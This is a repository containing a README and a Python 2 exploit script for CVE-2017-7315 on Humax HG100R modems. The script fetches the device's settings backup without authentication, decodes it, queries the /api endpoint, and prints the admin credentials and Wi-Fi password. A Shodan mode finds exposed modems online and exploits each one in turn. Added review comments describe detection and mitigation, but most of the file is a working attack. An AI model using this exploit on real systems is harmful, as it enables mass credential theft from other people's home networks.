├── README.md └── NETcrap.py /README.md: -------------------------------------------------------------------------------- 1 | # NETcrap - CVE 2017-7315 - Explorando o modem HG100R-L2 da NET 2 | 3 |

Para rodar:

4 | 5 | $ python NETCrap.py -h 6 | 7 | USAGE: python NETcrap.py [GATEWAY] 8 | Ex: 9 | python NETcrap.py http://192.168.0.1 10 | python NETcrap.py http://192.168.0.1/ 11 | python NETcrap.py 192.168.0.1 12 | python NETcrap.py 192.168.0.1/ 13 | 14 |

Help-me :o

15 | 16 | Contribua com minha pesquisa! Plz, ajude a tornar este código mais rápido e eficiente. Tks! 17 | 18 | desenvolvido por _carlosnericorreia_
19 | email: hackerama@protonmail.com
20 |
--------------------------------------------------------------------------------
/NETcrap.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Exploit: CVE 2017-7315
# Date: 12 July 2017
# Exploit Author: Carlos Neri Correia
# Author Contact: hackerama@protonmail.com
#
# NOTE(review): this listing was recovered from a whitespace-collapsed page.
# Indentation and the whitespace inside the multi-line strings are
# reconstructed and may differ from the author's file. The syntax is
# Python 2 (print statements, `except X, e`).
#
# What the code visibly does:
#   * GETs /view/basic/GatewaySettings.bin from the gateway with no
#     credentials attached, base64-decodes the body and saves it to saida.txt.
#   * POSTs the JSON-RPC method "QuickSetupInfo" to /api via curl and saves
#     the reply to wifi.txt.
#
# Defender's view: those two requests (an unauthenticated GET for the
# settings backup path, and a POST to /api carrying "QuickSetupInfo") are the
# observable traffic to look for in proxy, IDS or device logs. Exposure is
# reduced by keeping the modem's management interface off the WAN side and
# by running firmware that addresses CVE-2017-7315; admin and Wi-Fi
# credentials on a device that answered these requests should be treated as
# disclosed and rotated.

import subprocess
import base64
import requests
import sys
import shodan
import threading

def convert(gateway):
    """Return the backup-file URL for *gateway*.

    One trailing '/' is dropped, 'http://' is prepended when the value does
    not already start with it, and the settings-backup path is appended.
    """
    exploit = '/view/basic/GatewaySettings.bin'
    if gateway.endswith('/'):
        gateway = gateway[:-1]

    # Only the literal prefix 'http://' is recognised; any other scheme
    # would get 'http://' put in front of it.
    if not gateway.startswith('http://'):
        url = 'http://'+ gateway+ exploit
        return url
    else:
        url = gateway + exploit
        return url

def encontre(word):
    """Return the first line of wifi.txt that contains *word*.

    The line is returned with leading/trailing spaces stripped. Lines that
    start with '"ssid" : "#' after stripping are skipped. When nothing
    matches the function falls off the end and returns None, so the slicing
    done by the caller raises TypeError in that case.
    """

    # The file object is never closed explicitly.
    arq = open('wifi.txt', 'r').readlines()
    for item in arq:
        if item.rfind(word) != -1:
            trato = item.strip(' ')
            if trato.startswith('"ssid" : "#'):
                continue
            else:
                return trato
def wifi(gateway):
    """POST the QuickSetupInfo JSON-RPC call to the gateway and save the reply.

    The reply printed by curl is written to wifi.txt in the current directory.
    """
    # NOTE(review): `gateway` is concatenated into a shell command line and
    # run with shell=True. It comes from sys.argv or from Shodan result
    # fields and is not validated here, so shell metacharacters in it would
    # be interpreted by the local shell.
    comando = 'curl -X POST -s -H \'Content-Type: application/x-www-form-urlencoded charset=UTF-8\' -d \'{\"method\":\"QuickSetupInfo\",\"id\":90,\"jsonrpc":\"2.0\"}\' http://'+gateway+'/api'
    execu = subprocess.Popen([comando], shell=True, stdout=subprocess.PIPE).communicate()[0]
    # The response is stored unencrypted; the file handle is not closed
    # explicitly.
    arq = open('wifi.txt', 'w').write(execu)


def shod():
    """Run main() against every host returned by a Shodan search.

    Reads the module-level names `api` and `ssearch`, both set by the
    top-level script code. Each match's 'ip_str:port' is passed to main()
    and appended to ipes.txt.
    """
    try:
        results = api.search(ssearch) #'HUMAX org:"NET Virtua"'
        print 'Resultados encontrados: %s' % results['total']
        # NOTE(review): loop nesting is reconstructed; the statements below
        # all use `result`, so they are placed inside the loop.
        for result in results['matches']:
            gateway = (result['ip_str']+':' + str(result['port']))
            print '\n'+'-'*55
            print 'ALVO DETECTADO: ' + gateway
            t = threading.Thread(target=main, args=(gateway,))
            t.setDaemon(True)
            t.start()
            # join() follows start() directly, so hosts are handled one at a
            # time despite the thread.
            t.join()
            file = open('ipes.txt', 'a').write(result['ip_str']+':'+str(result['port'])+'\n')


    except shodan.APIError, e:
        print 'Error: %s' % e

    except KeyboardInterrupt, e:
        print '\n[NETcrap] - Voce escolheu sair.'

def usage():
    """Return the command-line help text."""

    return """
USAGE: python NETcrap.py [GATEWAY]
#rede interna
python NETcrap.py [IP EXTERNO:PORTA]
#rede externa
python NETcrap.py -s ['BUSCA']
#SHODAN search and exploit
python NETcrap -h
#this help :v

Ex:
python NETcrap.py 192.168.0.1
python NETcrap.py 192.168.0.1/
python NETcrap.py 179.123.123.179:9000
python -s 'HUMAX'
"""

def main(gateway):
    """Fetch the settings backup from *gateway* and print what it contains.

    Side effects visible in the code: writes saida.txt (decoded backup) and,
    through wifi(), wifi.txt; prints the two lines that `grep -A 1 admin`
    returns plus four fields sliced out of wifi.txt.
    """
    gateway2 = convert(gateway)
    #print gateway2
    url = gateway2
    try:
        print '\n[NETcrap] - Baixando e decodificando arquivo de backup.'
        # No auth, cookie or session argument is passed: the request is sent
        # unauthenticated.
        req = requests.get(url,timeout=15, stream=True)
        # NOTE(review): the nesting of the three statements under this loop
        # is a best guess from the collapsed listing.
        for chunk in req.iter_content(chunk_size=2048):
            if chunk:
                raw = req.content
                output = base64.b64decode(raw).decode('ascii','ignore').replace('^@','')
                # Decoded device configuration, stored unencrypted in the
                # working directory.
                open('saida.txt', 'w').write(output)

        # Fixed shell pipeline, no caller-supplied data in the command line.
        extract = subprocess.Popen(["strings saida.txt | grep -A 1 admin"], shell=True,stdout=subprocess.PIPE).communicate()[0].split('\n')
        wifi(gateway)
        print '[NETcrap] - Credenciais de acesso encontradas.\n'
        print 'INFOS DO MODEM:'
        print '---------------'
        print 'Login: %s' % extract[0]
        print 'Senha: %s' % extract[1]
        # The fixed slice offsets below presumably match the layout of the
        # /api reply as the author saw it; verify against a real response.
        print 'Modelo: ' + encontre('model_name') [16:-3]
        print 'Provedor: ' + encontre('vendor_name')[17:-2]+'\n'
        print 'INFOS DO WI-FI:'
        print '-------------- '
        print 'SSID: ' + encontre('"ssid"')[10:-3]
        print 'Password: ' + encontre('password')[14:-3]+'\n'

    # NOTE(review): bare except; every failure (network, decoding, missing
    # field, even KeyboardInterrupt) ends in the same message.
    except:
        print '\n[NETcrap] - Nao foi possivel obter as credenciais de acesso'
        pass

# Banner printed on every run, before argument handling.
print """
+-----------------------------------------------------+
| NETcrap - Exploit CVE 2017-7315 |
+-----------------------------------------------------+
facebook.com/hacker4ma

Download privilegiado de arquivo de backup e bypass dos
modems Humax Digital HG100R 2.0.6 (modems padrao da NET)
obtendo credenciais e outras informacoes sensiveis.
"""
# The key is empty in this listing; the client object is created on every
# run, not only in -s mode.
SHODAN_API_KEY = ""
api = shodan.Shodan(SHODAN_API_KEY)

# Argument dispatch: -h prints help, -s <query> runs the Shodan mode, any
# other first argument is treated as the gateway address.
if len(sys.argv) > 1:
    # convert() is applied before the flag checks, so '-h' and '-s' pass
    # through it as well; the result is unused in those branches.
    gateway = convert(sys.argv[1])
    url = str(gateway) #+'/view/basic/GatewaySettings.bin'
    if sys.argv[1] == '-h':
        print usage()
        sys.exit(0)
    if sys.argv[1] == '-s':
        try:
            # `ssearch` becomes the module-level name that shod() reads.
            ssearch = sys.argv[2]
            url = str(gateway)
            shod()
        except KeyboardInterrupt:
            sys.exit(0)
        sys.exit(0)
    else:

        main(sys.argv[1])
        # These two messages are printed whether or not main() succeeded.
        print '[NETcrap] - Arquivo de backup salvo como saida.txt. '
        print '[NETcrap] - Outras informacoes interessantes foram salvas no arquivo wifi.txt.\n'
else:
    print usage()



--------------------------------------------------------------------------------